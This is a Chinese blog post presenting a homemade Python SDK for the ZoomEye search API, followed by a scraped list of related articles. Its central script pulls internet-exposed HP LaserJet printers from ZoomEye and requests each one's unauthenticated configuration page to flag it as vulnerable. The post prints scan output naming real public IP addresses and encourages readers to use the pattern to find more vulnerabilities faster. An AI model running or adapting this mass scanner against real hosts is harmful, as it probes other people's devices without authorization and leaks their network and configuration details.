版权声明:未经作者授权,禁止转载!

ZoomEye想必大家都很熟悉,自从官方开放了API,网上各种版本的SDK乱飞。今天我也来发一个自己写的。

首先我们从https://github.com/SEC08/ZoomEye-API-SDK下载以后,解压以后我们直接运行python setup.py install来安装这个模块。这个过程类似大家安装Python的其他模块,比如说常见的requests.这里不多介绍了。等待安装完成以后,我们就可以来调用了。

利用SDK登录ZoomEye:

#!/usr/bin/env python

# -*-coding:utf-8 -*-

import sys

import requests

import zoomeye.zoomeye as zoomeye

test = zoomeye.zoomeye()

username = 'your main@qq.com'

password = 'your zoomeye account password'

token = test.logIn(username, password)

接着我们调用了脚本中的搜索方法,搜索的query可以参考官方给出的使用说明。。

#!/usr/bin/env python

# -*-coding:utf-8 -*-

import sys

import requests

import zoomeye.zoomeye as zoomeye

test = zoomeye.zoomeye()

username = 'your main@qq.com'

password = 'your ZoomEye account password'

token = test.logIn(username, password)

result = test.search('web',query='HP Color LaserJet',page=1,facets='app,os')

print result

返回数据是json的格式,官方文档中有详细的说明,这里我大致做了处理。

#!/usr/bin/env python

# -*-coding:utf-8 -*-

import sys

import requests

import zoomeye.zoomeye as zoomeye

test = zoomeye.zoomeye()

username = 'your main@qq.com'

password = 'your ZoomEye account password'

token = test.logIn(username, password)

result = test.search('web',query='HP Color LaserJet',page=1,facets='app,os')

target = []

for i in result:

    for x in i['matches']:

        print x['ip']

        target.append(x['ip'][0])

for ip in target:

    try:

        payload = '/hp/device/InternalPages/Index?id=ConfigurationPage'

        url = 'http://' + ip + payload

        res_exp = requests.get(url)

        print '[-]checking url %s' % url

        if res_exp.status_code == 200 and 'HomeDeviceName' in res_exp.content and 'HomeDeviceIp' in res_exp.content:

            print '[+]%s is vul' % url

        elif res_exp.status_code != 200:

            print '[+]%s is static' % url

        else:

            pass

    except Exception, e:

        pass

 然后结果是这样的:

[-]checking url http://192.185.150.112/hp/device/InternalPages/Index?id=ConfigurationPage

[-]checking url http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage

[+]http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage is static

[-]checking url http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage

[+]http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage is static

[-]checking url http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage

[+]http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage is static

[-]checking url http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage

[+]http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage is static

[-]checking url http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage

[+]http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage is static

[-]checking url http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage

[+]http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage is static

[-]checking url http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage

[+]http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage is static

这样是大致的演示过程,还有诸多的不足。这里想说的是,这是一个不错的漏扫模式,国内好多的安全厂商也都开始构建类似这样的工具。另外大家可以发挥自己的想象力和创造力。更快速的去挖到更多的漏洞。

Python 实现 ZoomEye API SDK的更多相关文章

  1. 『Python』Python 调用 ZoomEye API 批量获取目标网站IP

    #### 20160712 更新 原API的访问方式是以 HTTP 的方式访问的,根据官网最新文档,现在已经修改成 HTTPS 方式,测试可以正常使用API了. 0x 00 前言 ZoomEye 的 ...

  2. 从ZoomEye API 到 Weblogic 弱口令扫描

    参考资料: ZoomEye API: https://www.zoomeye.org/api/doc Weblogic-Weakpassword-Scnner: https://github.com/ ...

  3. 使用Python结合Face++ API识别人脸

    Face++是北京旷视科技旗下的视觉服务平台,可以进行人脸识别.检测等功能.其人脸识别技术据悉在目前准确率较高,其API非常友好,免费使用,功能众多,而且调用几乎没有限制.这里我使用了Python调用 ...

  4. 调用ZoomEye API获取信息

    最近在提高自己编程能力,拿一些实用的小工具练下.该脚本为python语言,主要涉及模块urllib,json,os模块. 功能:调用ZoomEye API获取信息 import urllib.requ ...

  5. 使用Python调用Flickr API抓取图片数据

    Flickr是雅虎旗下的图片分享网站,上面有全世界网友分享的大量精彩图片,被认为是专业的图片网站.其API也很友好,可以实现多种功能.这里我使用了Python调用其API获得了大量的照片数据.需要注意 ...

  6. 使用python+pychram进行API测试(接口测试)初级STEP 1

    花了一天时间安装了解了下最基本的python+pychram进行API测试,下面这个可以指导自己以后入门:基本的开发级别还需要学习 1.python下载地址:https://www.python.or ...

  7. WEB自动化(Python+selenium)的API

    在做Web自动化过程中,汇总了Python+selenium的API相关方法,给公司里的同事做了第二次培训,分享给大家                                         ...

  8. 使用sphinx快速为你python注释生成API文档

    sphinx简介sphinx是一种基于Python的文档工具,它可以令人轻松的撰写出清晰且优美的文档,由Georg Brandl在BSD许可证下开发.新版的Python3文档就是由sphinx生成的, ...

  9. 基于python调用libvirt API

    基于python调用libvirt API 1.程序代码 #!/usr/bin/python import libvirt import sys def createConnection(): con ...

随机推荐

  1. Tarjan算法求出强连通分量(包含若干个节点)

    [功能] Tarjan算法的用途之一是,求一个有向图G=(V,E)里极大强连通分量.强连通分量是指有向图G里顶点间能互相到达的子图.而如果一个强连通分量已经没有被其它强通分量完全包含的话,那么这个强连 ...

  2. App测试从入门到精通之性能测试

    好了,上节我们介绍了关于APP测试的功能测试方面一些细节.这一篇我们来介绍一下,关于APP测试过程中的性能测试参考要点,我们需要思考的如下: 响应时间 1.APP安装卸载的响应时间 2.APP各种功能 ...

  3. XE中FMX操作ListBox,添加上千条记录(含图片)

    我之前是想在ListBox的每个Item上添加一个图片,Item上所有的内容都是放在Object里赋值,结果发现加载一百条记录耗时四五秒: procedure TMainForm.AddItem; v ...

  4. delphi json用法

    用法:uses Superobject, Sperjsondelphi里有json单元. procedure TForm2.SuperObjectClick(Sender: TObject); var ...

  5. AD对象DirectoryEntry本地开发

    DirectoryEntry类如果需要在本地计算机开发需要满足以下条件: 1.本地计算机dns解析必须和AD域控制器的dns保持一致,如图: 2.必须模拟身份验证,才能操作查询AD用户 /// < ...

  6. Redis 一个很诡异的问题(部署)

    使用Redis并用window服务的方式 运行时.突然报错  在启动进程意外中止 解决方案: 调试了很久 发现居然是在 Logfile的配置中的问题. 错误的logfile logfile " ...

  7. .net core MVC Filters 过滤器介绍

    一.过滤器的优级依次介绍如下(逐次递减): Authorization Filter ->  Resource Filter -> Acton Filter -> Exception ...

  8. SQL Server 根据关键字和结束符提取字符串子串

    /* @info-待截取的字符串 @indexStr-截取子串的起始字符串 @split-截取子串的结束符号 列入依次传入 胸片:正常.心电图:异常,需要注意.血常规检查:正常. 心电图 '.' 返回 ...

  9. loj #2255. 「SNOI2017」炸弹

    #2255. 「SNOI2017」炸弹 题目描述 在一条直线上有 NNN 个炸弹,每个炸弹的坐标是 XiX_iX​i​​,爆炸半径是 RiR_iR​i​​,当一个炸弹爆炸时,如果另一个炸弹所在位置 X ...

  10. 洛谷P4724 【模板】三维凸包

    题面 传送门 题解 先理一下关于立体几何的基本芝士好了--顺便全都是从\(xzy\)巨巨的博客上抄来的 加减 三维向量加减和二维向量一样 模长 \(|a|=\sqrt{x^2+y^2+z^2}\) 点 ...